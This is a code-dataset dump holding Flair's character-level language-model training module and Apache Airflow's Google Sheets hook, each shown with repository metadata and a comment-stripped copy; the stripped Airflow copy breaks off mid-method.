self.dictionary = dictionary
self.forward = forward
self.split_on_char = character_level
self.random_case_flip = random_case_flip
self.shuffle_lines = shuffle_lines
if (type(path) == str):
path = Path(path)
self.train = TextDataset((path / 'train'), dictionary, False, self.forward,
self.split_on_char, self.random_case_flip, shuffle_lines=self.shuffle_lines)
self.valid = TextDataset((path / 'valid.txt'), dictionary, False, self.forward,
self.split_on_char, self.random_case_flip, shuffle_lines=False)[0]
self.test = TextDataset((path / 'test.txt'), dictionary, False, self.forward,
self.split_on_char, self.random_case_flip, shuffle_lines=False)[0]
class LanguageModelTrainer():
def __init__(self, model, corpus, optimizer=SGD, test_mode=False, epoch=0, split=0, loss=10000, optimizer_state=None):
self.model = model
self.optimizer = optimizer
self.corpus = corpus
self.test_mode = test_mode
self.loss_function = torch.nn.CrossEntropyLoss()
self.log_interval = 100
self.epoch = epoch
self.split = split
self.loss = loss
self.optimizer_state = optimizer_state
def train(self, base_path, sequence_length, learning_rate=20, mini_batch_size=100, anneal_factor=0.25, patience=10, clip=0.25, max_epochs=1000, checkpoint=False, grow_to_sequence_length=0, num_workers=2, use_amp=False, amp_opt_level='O1', **kwargs):
if use_amp:
if (sys.version_info < (3, 0)):
raise RuntimeError(
'Apex currently only supports Python 3. Aborting.')
if (amp is None):
raise RuntimeError(
'Failed to import apex. Please install apex from https://www.github.com/nvidia/apex to enable mixed-precision training.')
if (type(base_path) is str):
base_path = Path(base_path)
add_file_handler(log, (base_path / 'training.log'))
number_of_splits = len(self.corpus.train)
val_data = self._batchify(self.corpus.valid, mini_batch_size)
base_path.mkdir(parents=True, exist_ok=True)
loss_txt = (base_path / 'loss.txt')
savefile = (base_path / 'best-lm.pt')
try:
epoch = self.epoch
best_val_loss = self.loss
optimizer = self.optimizer(
self.model.parameters(), lr=learning_rate, **kwargs)
if (self.optimizer_state is not None):
optimizer.load_state_dict(self.optimizer_state)
if isinstance(optimizer, (AdamW, SGDW)):
scheduler = ReduceLRWDOnPlateau(
optimizer, verbose=True, factor=anneal_factor, patience=patience)
else:
scheduler = ReduceLROnPlateau(
optimizer, verbose=True, factor=anneal_factor, patience=patience)
if use_amp:
(self.model, optimizer) = amp.initialize(
self.model, optimizer, opt_level=amp_opt_level)
training_generator = DataLoader(
self.corpus.train, shuffle=False, num_workers=num_workers)
for epoch in range(self.epoch, max_epochs):
epoch_start_time = time.time()
if (epoch > 0):
training_generator = DataLoader(
self.corpus.train, shuffle=True, num_workers=num_workers)
self.model.save_checkpoint(
(base_path / ''.join(['epoch_', '{}'.format(epoch), '.pt'])), optimizer, epoch, 0, best_val_loss)
for (curr_split, train_slice) in enumerate(training_generator, self.split):
if (sequence_length < grow_to_sequence_length):
sequence_length += 1
log.info(
''.join(['Sequence length is ', '{}'.format(sequence_length)]))
split_start_time = time.time()
curr_split += 1
train_data = self._batchify(
train_slice.flatten(), mini_batch_size)
log.info((('Split %d' % curr_split) +
'\t - ({:%H:%M:%S})'.format(datetime.datetime.now())))
for group in optimizer.param_groups:
learning_rate = group['lr']
self.model.train()
hidden = self.model.init_hidden(mini_batch_size)
ntokens = len(self.corpus.dictionary)
total_loss = 0
start_time = time.time()
for (batch, i) in enumerate(range(0, (train_data.size(0) - 1), sequence_length)):
(data, targets) = self._get_batch(
train_data, i, sequence_length)
if ((not data.is_cuda) and cuda.is_available()):
log.info(
('Batch %d is not on CUDA, training will be very slow' % batch))
raise Exception('data isnt on cuda')
self.model.zero_grad()
optimizer.zero_grad()
(output, rnn_output, hidden) = self.model.forward(
data, hidden)
loss = self.loss_function(
output.view((- 1), ntokens), targets)
if use_amp:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(
self.model.parameters(), clip)
optimizer.step()
total_loss += loss.data
hidden = self._repackage_hidden(hidden)
del loss, output, rnn_output
if (((batch % self.log_interval) == 0) and (batch > 0)):
cur_loss = (total_loss.item() / self.log_interval)
elapsed = (time.time() - start_time)
log.info('| split {:3d} /{:3d} | {:5d}/{:5d} batches | ms/batch {:5.2f} | loss {:5.2f} | ppl {:8.2f}'.format(
curr_split, number_of_splits, batch, (len(train_data) // sequence_length), ((elapsed * 1000) / self.log_interval), cur_loss, math.exp(cur_loss)))
total_loss = 0
start_time = time.time()
log.info(('%d seconds for train split %d' %
((time.time() - split_start_time), curr_split)))
self.model.eval()
val_loss = self.evaluate(
val_data, mini_batch_size, sequence_length)
scheduler.step(val_loss)
log.info('best loss so far {:5.2f}'.format(best_val_loss))
log.info(self.model.generate_text())
if checkpoint:
self.model.save_checkpoint(
(base_path / 'checkpoint.pt'), optimizer, epoch, curr_split, best_val_loss)
if (val_loss < best_val_loss):
self.model.best_score = best_val_loss
self.model.save(savefile)
best_val_loss = val_loss
log.info(('-' * 89))
summary = '| end of split {:3d} /{:3d} | epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | valid ppl {:8.2f} | learning rate {:3.4f}'.format(
curr_split, number_of_splits, (epoch + 1), (time.time() - split_start_time), val_loss, math.exp(val_loss), learning_rate)
with open(loss_txt, 'a') as myfile:
myfile.write(('%s\n' % summary))
log.info(summary)
log.info(('-' * 89))
log.info(('Epoch time: %.2f' %
(time.time() - epoch_start_time)))
except KeyboardInterrupt:
log.info(('-' * 89))
log.info('Exiting from training early')
test_data = self._batchify(self.corpus.test, mini_batch_size)
test_loss = self.evaluate(test_data, mini_batch_size, sequence_length)
summary = 'TEST: valid loss {:5.2f} | valid ppl {:8.2f}'.format(
test_loss, math.exp(test_loss))
with open(loss_txt, 'a') as myfile:
myfile.write(('%s\n' % summary))
log.info(summary)
log.info(('-' * 89))
def evaluate(self, data_source, eval_batch_size, sequence_length):
self.model.eval()
with torch.no_grad():
total_loss = 0
ntokens = len(self.corpus.dictionary)
hidden = self.model.init_hidden(eval_batch_size)
for i in range(0, (data_source.size(0) - 1), sequence_length):
(data, targets) = self._get_batch(
data_source, i, sequence_length)
(prediction, rnn_output, hidden) = self.model.forward(data, hidden)
output_flat = prediction.view((- 1), ntokens)
total_loss += (len(data) *
self.loss_function(output_flat, targets).data)
hidden = self._repackage_hidden(hidden)
return (total_loss.item() / len(data_source))
@staticmethod
def _batchify(data, batch_size):
nbatch = (data.size(0) // batch_size)
data = data.narrow(0, 0, (nbatch * batch_size))
data = data.view(batch_size, (- 1)).t().contiguous()
return data
@staticmethod
def _get_batch(source, i, sequence_length):
seq_len = min(sequence_length, ((len(source) - 1) - i))
data = source[i:(i + seq_len)].clone().detach()
target = source[(i + 1):((i + 1) + seq_len)
].view((- 1)).clone().detach()
data = data.to(flair.device)
target = target.to(flair.device)
return (data, target)
@staticmethod
def _repackage_hidden(h):
'Wraps hidden states in new tensors, to detach them from their history.'
return tuple((v.clone().detach() for v in h))
@staticmethod
def load_from_checkpoint(checkpoint_file, corpus, optimizer=SGD):
checkpoint = LanguageModel.load_checkpoint(checkpoint_file)
return LanguageModelTrainer(checkpoint['model'], corpus, optimizer, epoch=checkpoint['epoch'], split=checkpoint['split'], loss=checkpoint['loss'], optimizer_state=checkpoint['optimizer_state_dict'])
| 46.250765 | 253 | 0.540796 |
import time
import datetime
import random
import sys
import logging
from pathlib import Path
from typing import Union
from torch import cuda
from torch.utils.data import Dataset, DataLoader
from torch.optim.sgd import SGD
try:
from apex import amp
except ImportError:
amp = None
import flair
from flair.data import Dictionary
from flair.models import LanguageModel
from flair.optim import *
from flair.training_utils import add_file_handler
log = logging.getLogger('flair')
class TextDataset(Dataset):
def __init__(self, path, dictionary, expand_vocab=False, forward=True, split_on_char=True, random_case_flip=True, shuffle_lines=True):
assert path.exists()
self.files = None
self.path = path
self.dictionary = dictionary
self.split_on_char = split_on_char
self.forward = forward
self.random_case_flip = random_case_flip
self.expand_vocab = expand_vocab
self.shuffle_lines = shuffle_lines
if path.is_dir():
self.files = sorted([f for f in path.iterdir() if f.exists()])
else:
self.files = [path]
def __len__(self):
return len(self.files)
def __getitem__(self, index=0):
return self.charsplit(self.files[index], self.expand_vocab, self.forward, self.split_on_char, self.random_case_flip)
def charsplit(self, path, expand_vocab=False, forward=True, split_on_char=True, random_case_flip=True):
assert path.exists()
lines = open(path, 'r', encoding='utf-8').readlines()
log.info(
''.join(['read text file with ', '{}'.format(len(lines)), ' lines']))
if self.shuffle_lines:
random.shuffle(lines)
log.info('shuffled')
tokens = 0
for line in lines:
if split_on_char:
chars = list(line)
else:
chars = line.split()
tokens += len(chars)
if expand_vocab:
for char in chars:
self.dictionary.add_item(char)
ids = torch.zeros(tokens, dtype=torch.long)
if forward:
token = 0
for line in lines:
if random_case_flip:
line = self.random_casechange(line)
if split_on_char:
chars = list(line)
else:
chars = line.split()
for char in chars:
if (token >= tokens):
break
ids[token] = self.dictionary.get_idx_for_item(char)
token += 1
else:
token = (tokens - 1)
for line in lines:
if random_case_flip:
line = self.random_casechange(line)
if split_on_char:
chars = list(line)
else:
chars = line.split()
for char in chars:
if (token >= tokens):
break
ids[token] = self.dictionary.get_idx_for_item(char)
token -= 1
return ids
@staticmethod
def random_casechange(line):
no = random.randint(0, 99)
if (no is 0):
line = line.lower()
if (no is 1):
line = line.upper()
return line
def tokenize(self, path):
assert path.exists()
with open(path, 'r') as f:
tokens = 0
for line in f:
words = (line.split() + ['<eos>'])
tokens += len(words)
for word in words:
self.dictionary.add_word(word)
with open(path, 'r') as f:
ids = torch.zeros(tokens, dtype=torch.long, device=flair.device)
token = 0
for line in f:
words = (line.split() + ['<eos>'])
for word in words:
ids[token] = self.dictionary.word2idx[word]
token += 1
return ids
class TextCorpus(object):
def __init__(self, path, dictionary, forward=True, character_level=True, random_case_flip=True, shuffle_lines=True):
self.dictionary = dictionary
self.forward = forward
self.split_on_char = character_level
self.random_case_flip = random_case_flip
self.shuffle_lines = shuffle_lines
if (type(path) == str):
path = Path(path)
self.train = TextDataset((path / 'train'), dictionary, False, self.forward,
self.split_on_char, self.random_case_flip, shuffle_lines=self.shuffle_lines)
self.valid = TextDataset((path / 'valid.txt'), dictionary, False, self.forward,
self.split_on_char, self.random_case_flip, shuffle_lines=False)[0]
self.test = TextDataset((path / 'test.txt'), dictionary, False, self.forward,
self.split_on_char, self.random_case_flip, shuffle_lines=False)[0]
class LanguageModelTrainer():
def __init__(self, model, corpus, optimizer=SGD, test_mode=False, epoch=0, split=0, loss=10000, optimizer_state=None):
self.model = model
self.optimizer = optimizer
self.corpus = corpus
self.test_mode = test_mode
self.loss_function = torch.nn.CrossEntropyLoss()
self.log_interval = 100
self.epoch = epoch
self.split = split
self.loss = loss
self.optimizer_state = optimizer_state
def train(self, base_path, sequence_length, learning_rate=20, mini_batch_size=100, anneal_factor=0.25, patience=10, clip=0.25, max_epochs=1000, checkpoint=False, grow_to_sequence_length=0, num_workers=2, use_amp=False, amp_opt_level='O1', **kwargs):
if use_amp:
if (sys.version_info < (3, 0)):
raise RuntimeError(
'Apex currently only supports Python 3. Aborting.')
if (amp is None):
raise RuntimeError(
'Failed to import apex. Please install apex from https://www.github.com/nvidia/apex to enable mixed-precision training.')
if (type(base_path) is str):
base_path = Path(base_path)
add_file_handler(log, (base_path / 'training.log'))
number_of_splits = len(self.corpus.train)
val_data = self._batchify(self.corpus.valid, mini_batch_size)
base_path.mkdir(parents=True, exist_ok=True)
loss_txt = (base_path / 'loss.txt')
savefile = (base_path / 'best-lm.pt')
try:
epoch = self.epoch
best_val_loss = self.loss
optimizer = self.optimizer(
self.model.parameters(), lr=learning_rate, **kwargs)
if (self.optimizer_state is not None):
optimizer.load_state_dict(self.optimizer_state)
if isinstance(optimizer, (AdamW, SGDW)):
scheduler = ReduceLRWDOnPlateau(
optimizer, verbose=True, factor=anneal_factor, patience=patience)
else:
scheduler = ReduceLROnPlateau(
optimizer, verbose=True, factor=anneal_factor, patience=patience)
if use_amp:
(self.model, optimizer) = amp.initialize(
self.model, optimizer, opt_level=amp_opt_level)
training_generator = DataLoader(
self.corpus.train, shuffle=False, num_workers=num_workers)
for epoch in range(self.epoch, max_epochs):
epoch_start_time = time.time()
if (epoch > 0):
training_generator = DataLoader(
self.corpus.train, shuffle=True, num_workers=num_workers)
self.model.save_checkpoint(
(base_path / ''.join(['epoch_', '{}'.format(epoch), '.pt'])), optimizer, epoch, 0, best_val_loss)
for (curr_split, train_slice) in enumerate(training_generator, self.split):
if (sequence_length < grow_to_sequence_length):
sequence_length += 1
log.info(
''.join(['Sequence length is ', '{}'.format(sequence_length)]))
split_start_time = time.time()
curr_split += 1
train_data = self._batchify(
train_slice.flatten(), mini_batch_size)
log.info((('Split %d' % curr_split) +
'\t - ({:%H:%M:%S})'.format(datetime.datetime.now())))
for group in optimizer.param_groups:
learning_rate = group['lr']
self.model.train()
hidden = self.model.init_hidden(mini_batch_size)
ntokens = len(self.corpus.dictionary)
total_loss = 0
start_time = time.time()
for (batch, i) in enumerate(range(0, (train_data.size(0) - 1), sequence_length)):
(data, targets) = self._get_batch(
train_data, i, sequence_length)
if ((not data.is_cuda) and cuda.is_available()):
log.info(
('Batch %d is not on CUDA, training will be very slow' % batch))
raise Exception('data isnt on cuda')
self.model.zero_grad()
optimizer.zero_grad()
(output, rnn_output, hidden) = self.model.forward(
data, hidden)
loss = self.loss_function(
output.view((- 1), ntokens), targets)
if use_amp:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(
self.model.parameters(), clip)
optimizer.step()
total_loss += loss.data
hidden = self._repackage_hidden(hidden)
del loss, output, rnn_output
if (((batch % self.log_interval) == 0) and (batch > 0)):
cur_loss = (total_loss.item() / self.log_interval)
elapsed = (time.time() - start_time)
log.info('| split {:3d} /{:3d} | {:5d}/{:5d} batches | ms/batch {:5.2f} | loss {:5.2f} | ppl {:8.2f}'.format(
curr_split, number_of_splits, batch, (len(train_data) // sequence_length), ((elapsed * 1000) / self.log_interval), cur_loss, math.exp(cur_loss)))
total_loss = 0
start_time = time.time()
log.info(('%d seconds for train split %d' %
((time.time() - split_start_time), curr_split)))
self.model.eval()
val_loss = self.evaluate(
val_data, mini_batch_size, sequence_length)
scheduler.step(val_loss)
log.info('best loss so far {:5.2f}'.format(best_val_loss))
log.info(self.model.generate_text())
if checkpoint:
self.model.save_checkpoint(
(base_path / 'checkpoint.pt'), optimizer, epoch, curr_split, best_val_loss)
if (val_loss < best_val_loss):
self.model.best_score = best_val_loss
self.model.save(savefile)
best_val_loss = val_loss
log.info(('-' * 89))
summary = '| end of split {:3d} /{:3d} | epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | valid ppl {:8.2f} | learning rate {:3.4f}'.format(
curr_split, number_of_splits, (epoch + 1), (time.time() - split_start_time), val_loss, math.exp(val_loss), learning_rate)
with open(loss_txt, 'a') as myfile:
myfile.write(('%s\n' % summary))
log.info(summary)
log.info(('-' * 89))
log.info(('Epoch time: %.2f' %
(time.time() - epoch_start_time)))
except KeyboardInterrupt:
log.info(('-' * 89))
log.info('Exiting from training early')
test_data = self._batchify(self.corpus.test, mini_batch_size)
test_loss = self.evaluate(test_data, mini_batch_size, sequence_length)
summary = 'TEST: valid loss {:5.2f} | valid ppl {:8.2f}'.format(
test_loss, math.exp(test_loss))
with open(loss_txt, 'a') as myfile:
myfile.write(('%s\n' % summary))
log.info(summary)
log.info(('-' * 89))
def evaluate(self, data_source, eval_batch_size, sequence_length):
self.model.eval()
with torch.no_grad():
total_loss = 0
ntokens = len(self.corpus.dictionary)
hidden = self.model.init_hidden(eval_batch_size)
for i in range(0, (data_source.size(0) - 1), sequence_length):
(data, targets) = self._get_batch(
data_source, i, sequence_length)
(prediction, rnn_output, hidden) = self.model.forward(data, hidden)
output_flat = prediction.view((- 1), ntokens)
total_loss += (len(data) *
self.loss_function(output_flat, targets).data)
hidden = self._repackage_hidden(hidden)
return (total_loss.item() / len(data_source))
@staticmethod
def _batchify(data, batch_size):
nbatch = (data.size(0) // batch_size)
data = data.narrow(0, 0, (nbatch * batch_size))
data = data.view(batch_size, (- 1)).t().contiguous()
return data
@staticmethod
def _get_batch(source, i, sequence_length):
seq_len = min(sequence_length, ((len(source) - 1) - i))
data = source[i:(i + seq_len)].clone().detach()
target = source[(i + 1):((i + 1) + seq_len)
].view((- 1)).clone().detach()
data = data.to(flair.device)
target = target.to(flair.device)
return (data, target)
@staticmethod
def _repackage_hidden(h):
return tuple((v.clone().detach() for v in h))
@staticmethod
def load_from_checkpoint(checkpoint_file, corpus, optimizer=SGD):
checkpoint = LanguageModel.load_checkpoint(checkpoint_file)
return LanguageModelTrainer(checkpoint['model'], corpus, optimizer, epoch=checkpoint['epoch'], split=checkpoint['split'], loss=checkpoint['loss'], optimizer_state=checkpoint['optimizer_state_dict'])
| true | true |
f732816fcf0c052b8864c70a21b2d1c1057d92db | 14,981 | py | Python | airflow/providers/google/suite/hooks/sheets.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 8 | 2017-04-20T16:15:44.000Z | 2020-10-11T13:44:10.000Z | airflow/providers/google/suite/hooks/sheets.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 219 | 2017-03-15T18:40:16.000Z | 2022-02-28T22:52:43.000Z | airflow/providers/google/suite/hooks/sheets.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 3 | 2016-07-14T21:51:10.000Z | 2020-10-12T13:26:36.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
This module contains a Google Sheets API hook
"""
from typing import Any, Dict, List, Optional
from googleapiclient.discovery import build
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.base import CloudBaseHook
class GSheetsHook(CloudBaseHook):
"""
Interact with Google Sheets via GCP connection
Reading and writing cells in Google Sheet:
https://developers.google.com/sheets/api/guides/values
:param gcp_conn_id: The connection ID to use when fetching connection info.
:type gcp_conn_id: str
:param spreadsheet_id: The Google Sheet ID to interact with
:type spreadsheet_id: str
:param api_version: API Version
:type api_version: str
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
"""
def __init__(
self,
spreadsheet_id: str,
gcp_conn_id: str = 'google_cloud_default',
api_version: str = 'v4',
delegate_to: Optional[str] = None
) -> None:
super().__init__(gcp_conn_id, delegate_to)
self.spreadsheet_id = spreadsheet_id
self.gcp_conn_id = gcp_conn_id
self.api_version = api_version
self.delegate_to = delegate_to
self._conn = None
def get_conn(self) -> Any:
"""
Retrieves connection to Google Sheets.
:return: Google Sheets services object.
:rtype: Any
"""
if not self._conn:
http_authorized = self._authorize()
self._conn = build('sheets', self.api_version, http=http_authorized, cache_discovery=False)
return self._conn
@CloudBaseHook.catch_http_exception
def get_values(
self,
range_: str,
major_dimension: str = 'DIMENSION_UNSPECIFIED',
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
"""
Gets values from Google Sheet from a single range
https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/get
:param range_: The A1 notation of the values to retrieve.
:type range_: str
:param major_dimension: Indicates which dimension an operation should apply to.
DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
:type major_dimension: str
:param value_render_option: Determines how values should be rendered in the output.
FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
:type value_render_option: str
:param date_time_render_option: Determines how dates should be rendered in the output.
SERIAL_NUMBER or FORMATTED_STRING
:type date_time_render_option: str
:return: Google Sheets API response.
:rtype: Dict
"""
service = self.get_conn()
response = service.spreadsheets().values().get( # pylint: disable=no-member
spreadsheetId=self.spreadsheet_id,
range=range_,
majorDimension=major_dimension,
valueRenderOption=value_render_option,
dateTimeRenderOption=date_time_render_option
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def batch_get_values(
self,
ranges: List,
major_dimension: str = 'DIMENSION_UNSPECIFIED',
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
"""
Gets values from Google Sheet from a list of ranges
https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/batchGet
:param ranges: The A1 notation of the values to retrieve.
:type ranges: List
:param major_dimension: Indicates which dimension an operation should apply to.
DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
:type major_dimension: str
:param value_render_option: Determines how values should be rendered in the output.
FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
:type value_render_option: str
:param date_time_render_option: Determines how dates should be rendered in the output.
SERIAL_NUMBER or FORMATTED_STRING
:type date_time_render_option: str
:return: Google Sheets API response.
:rtype: Dict
"""
service = self.get_conn()
response = service.spreadsheets().values().batchGet( # pylint: disable=no-member
spreadsheetId=self.spreadsheet_id,
ranges=ranges,
majorDimension=major_dimension,
valueRenderOption=value_render_option,
dateTimeRenderOption=date_time_render_option
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def update_values(
self,
range_: str,
values: List,
major_dimension: str = 'ROWS',
value_input_option: str = 'RAW',
include_values_in_response: bool = False,
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
"""
Updates values from Google Sheet from a single range
https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/update
:param range_: The A1 notation of the values to retrieve.
:type range_: str
:param values: Data within a range of the spreadsheet.
:type values: List
:param major_dimension: Indicates which dimension an operation should apply to.
DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
:type major_dimension: str
:param value_input_option: Determines how input data should be interpreted.
RAW or USER_ENTERED
:type value_input_option: str
:param include_values_in_response: Determines if the update response should
include the values of the cells that were updated.
:type include_values_in_response: bool
:param value_render_option: Determines how values should be rendered in the output.
FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
:type value_render_option: str
:param date_time_render_option: Determines how dates should be rendered in the output.
SERIAL_NUMBER or FORMATTED_STRING
:type date_time_render_option: str
:return: Google Sheets API response.
:rtype: Dict
"""
service = self.get_conn()
body = {
"range": range_,
"majorDimension": major_dimension,
"values": values
}
response = service.spreadsheets().values().update( # pylint: disable=no-member
spreadsheetId=self.spreadsheet_id,
range=range_,
valueInputOption=value_input_option,
includeValuesInResponse=include_values_in_response,
responseValueRenderOption=value_render_option,
responseDateTimeRenderOption=date_time_render_option,
body=body
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def batch_update_values(
self,
ranges: List,
values: List,
major_dimension: str = 'ROWS',
value_input_option: str = 'RAW',
include_values_in_response: bool = False,
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
"""
Updates values from Google Sheet for multiple ranges
https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/batchUpdate
:param ranges: The A1 notation of the values to retrieve.
:type ranges: List
:param values: Data within a range of the spreadsheet.
:type values: List
:param major_dimension: Indicates which dimension an operation should apply to.
DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
:type major_dimension: str
:param value_input_option: Determines how input data should be interpreted.
RAW or USER_ENTERED
:type value_input_option: str
:param include_values_in_response: Determines if the update response should
include the values of the cells that were updated.
:type include_values_in_response: bool
:param value_render_option: Determines how values should be rendered in the output.
FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
:type value_render_option: str
:param date_time_render_option: Determines how dates should be rendered in the output.
SERIAL_NUMBER or FORMATTED_STRING
:type date_time_render_option: str
:return: Google Sheets API response.
:rtype: Dict
"""
if len(ranges) != len(values):
raise AirflowException(
"'Ranges' and and 'Lists' must be of equal length. \n \
'Ranges' is of length: {} and \n \
'Values' is of length: {}.".format(str(len(ranges)), str(len(values))))
service = self.get_conn()
data = []
for idx, range_ in enumerate(ranges):
value_range = {
"range": range_,
"majorDimension": major_dimension,
"values": values[idx]
}
data.append(value_range)
body = {
"valueInputOption": value_input_option,
"data": data,
"includeValuesInResponse": include_values_in_response,
"responseValueRenderOption": value_render_option,
"responseDateTimeRenderOption": date_time_render_option
}
response = service.spreadsheets().values().batchUpdate( # pylint: disable=no-member
spreadsheetId=self.spreadsheet_id,
body=body
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def append_values(
self,
range_: str,
values: List,
major_dimension: str = 'ROWS',
value_input_option: str = 'RAW',
insert_data_option: str = 'OVERWRITE',
include_values_in_response: bool = False,
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
"""
Append values from Google Sheet from a single range
https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/append
:param range_: The A1 notation of the values to retrieve.
:type range_: str
:param values: Data within a range of the spreadsheet.
:type values: List
:param major_dimension: Indicates which dimension an operation should apply to.
DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
:type major_dimension: str
:param value_input_option: Determines how input data should be interpreted.
RAW or USER_ENTERED
:type value_input_option: str
:param insert_data_option: Determines how existing data is changed when new data is input.
OVERWRITE or INSERT_ROWS
:type insert_data_option: str
:param include_values_in_response: Determines if the update response should
include the values of the cells that were updated.
:type include_values_in_response: bool
:param value_render_option: Determines how values should be rendered in the output.
FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
:type value_render_option: str
:param date_time_render_option: Determines how dates should be rendered in the output.
SERIAL_NUMBER or FORMATTED_STRING
:type date_time_render_option: str
:return: Google Sheets API response.
:rtype: Dict
"""
service = self.get_conn()
body = {
"range": range_,
"majorDimension": major_dimension,
"values": values
}
response = service.spreadsheets().values().append( # pylint: disable=no-member
spreadsheetId=self.spreadsheet_id,
range=range_,
valueInputOption=value_input_option,
insertDataOption=insert_data_option,
includeValuesInResponse=include_values_in_response,
responseValueRenderOption=value_render_option,
responseDateTimeRenderOption=date_time_render_option,
body=body
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def clear(self, range_: str) -> Dict:
"""
Clear values from Google Sheet from a single range
https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/clear
:param range_: The A1 notation of the values to retrieve.
:type range_: str
:return: Google Sheets API response.
:rtype: Dict
"""
service = self.get_conn()
response = service.spreadsheets().values().clear( # pylint: disable=no-member
spreadsheetId=self.spreadsheet_id,
range=range_
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def batch_clear(self, ranges: List) -> Dict:
"""
Clear values from Google Sheet from a list of ranges
https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/batchClear
:param ranges: The A1 notation of the values to retrieve.
:type ranges: List
:return: Google Sheets API response.
:rtype: Dict
"""
service = self.get_conn()
body = {
"ranges": ranges
}
response = service.spreadsheets().values().batchClear( # pylint: disable=no-member
spreadsheetId=self.spreadsheet_id,
body=body
).execute(num_retries=self.num_retries)
return response
| 40.489189 | 103 | 0.660437 |
from typing import Any, Dict, List, Optional
from googleapiclient.discovery import build
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.base import CloudBaseHook
class GSheetsHook(CloudBaseHook):
def __init__(
self,
spreadsheet_id: str,
gcp_conn_id: str = 'google_cloud_default',
api_version: str = 'v4',
delegate_to: Optional[str] = None
) -> None:
super().__init__(gcp_conn_id, delegate_to)
self.spreadsheet_id = spreadsheet_id
self.gcp_conn_id = gcp_conn_id
self.api_version = api_version
self.delegate_to = delegate_to
self._conn = None
def get_conn(self) -> Any:
if not self._conn:
http_authorized = self._authorize()
self._conn = build('sheets', self.api_version, http=http_authorized, cache_discovery=False)
return self._conn
@CloudBaseHook.catch_http_exception
def get_values(
self,
range_: str,
major_dimension: str = 'DIMENSION_UNSPECIFIED',
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
service = self.get_conn()
response = service.spreadsheets().values().get(
spreadsheetId=self.spreadsheet_id,
range=range_,
majorDimension=major_dimension,
valueRenderOption=value_render_option,
dateTimeRenderOption=date_time_render_option
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def batch_get_values(
self,
ranges: List,
major_dimension: str = 'DIMENSION_UNSPECIFIED',
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
service = self.get_conn()
response = service.spreadsheets().values().batchGet(
spreadsheetId=self.spreadsheet_id,
ranges=ranges,
majorDimension=major_dimension,
valueRenderOption=value_render_option,
dateTimeRenderOption=date_time_render_option
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def update_values(
self,
range_: str,
values: List,
major_dimension: str = 'ROWS',
value_input_option: str = 'RAW',
include_values_in_response: bool = False,
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
service = self.get_conn()
body = {
"range": range_,
"majorDimension": major_dimension,
"values": values
}
response = service.spreadsheets().values().update(
spreadsheetId=self.spreadsheet_id,
range=range_,
valueInputOption=value_input_option,
includeValuesInResponse=include_values_in_response,
responseValueRenderOption=value_render_option,
responseDateTimeRenderOption=date_time_render_option,
body=body
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def batch_update_values(
self,
ranges: List,
values: List,
